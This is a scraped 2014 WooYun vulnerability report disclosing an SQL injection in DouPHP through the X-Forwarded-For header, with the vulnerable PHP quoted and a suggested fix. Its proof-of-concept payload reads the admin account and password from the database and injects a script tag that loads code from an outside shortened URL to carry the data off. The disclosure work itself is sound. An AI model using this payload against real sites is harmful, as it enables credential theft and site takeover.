DouPHP一漏洞多用（影响敏感数据） | wooyun-2014-067026| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-067026

漏洞标题：DouPHP一漏洞多用（影响敏感数据）

漏洞作者： Tea

提交时间：2014-07-04 18:48

修复时间：2014-09-29 18:50

公开时间：2014-09-29 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-04：细节已通知厂商并且等待厂商处理中
2014-07-09：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-09-02：细节向核心白帽子及相关领域专家公开
2014-09-12：细节向普通白帽子公开
2014-09-22：细节向实习白帽子公开
2014-09-29：细节向公众公开

简要描述：

一个漏洞多种利用,这个是无需登录啥的,但是把这漏洞演示成了这样，方便看~~~~

详细说明：

DouPHP这个东西几个地方地方都调用了,归根结底是这玩意出问题，所以就拿出来说：

function get_ip()
	{
		static $ip;
		if (isset ($_SERVER))
		{
			if (isset ($_SERVER["HTTP_X_FORWARDED_FOR"]))
			{
				$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
			}
			else
				if (isset ($_SERVER["HTTP_CLIENT_IP"]))
				{
					$ip = $_SERVER["HTTP_CLIENT_IP"];
				}
				else
				{
					$ip = $_SERVER["REMOTE_ADDR"];
				}
		}
		else
		{
			if (getenv("HTTP_X_FORWARDED_FOR"))
			{
				$ip = getenv("HTTP_X_FORWARDED_FOR");
			}
			else
				if (getenv("HTTP_CLIENT_IP"))
				{
					$ip = getenv("HTTP_CLIENT_IP");
				}
				else
				{
					$ip = getenv("REMOTE_ADDR");
				}
		}
		return $ip;
	}

IP就直接获取然后也不转换也不检查，就带入了。PS（貌似你们的SQL.PHP都没包含?）
调用文件如：guestbook.php留言
171-172行

$sql = "INSERT INTO " . $dou->table('guestbook') . " (id, title, name, contact_type, contact, content, ip, add_time)" .
		" VALUES (NULL, '$_POST[title]', '$_POST[name]', '$_POST[contact_type]', '$_POST[contact]', '$_POST[content]', '$ip', '$add_time')";

SO.修改HTTP头就可以插入了~

漏洞证明：

其实这个insert语句之前已经有个SELECT语句进行查询了，但是那玩意只能盲注，所以用这个可以方便回显的演示，用到的SELECT：

function is_water($ip)
{
	$unread_messages = $GLOBALS['dou']->get_one("SELECT COUNT(*) FROM " . $GLOBALS['dou']->table('guestbook') . " WHERE ip = '$ip' AND if_read = '0'");
	/* 如果管理员未回复的留言数量大于3 */
	if ($unread_messages >= '3') return true;
}

POC：
修改X-forwarded-For:

1.1.1.1', '1404117840'),(NULL, (select/**/concat(user_name,0x3a,0x3a,password)/**/from/**/dou_admin/**/limit/**/1), '<script src="http://url.cn/QI7er4"></script>', '3', '4', '5', '6

这里我做的操作就是，把管理员的帐号密码读出来，在留言处，然后通过插入的XSS代码，读取出来：
官网DEMO演示：

修复方案：

获取IP进行转换或者正则匹配。

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-09-29 18:50

厂商回复：

漏洞评价：

2014-12-11 17:39 | 叮咚叮咚 ( 路人 | Rank:0 漏洞数:2 | 热爱生活，热爱技术)

我发现留言处的那个insert操作，内容，标题处都是没有过滤的？应该怎么利用？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-067026

漏洞标题：DouPHP一漏洞多用（影响敏感数据）

相关厂商：douco.com

漏洞作者： Tea

提交时间：2014-07-04 18:48

修复时间：2014-09-29 18:50

公开时间：2014-09-29 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-067026

漏洞标题：DouPHP一漏洞多用（影响敏感数据）

相关厂商：douco.com

漏洞作者： Tea

提交时间：2014-07-04 18:48

修复时间：2014-09-29 18:50

公开时间：2014-09-29 18:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-067026"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Tea@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：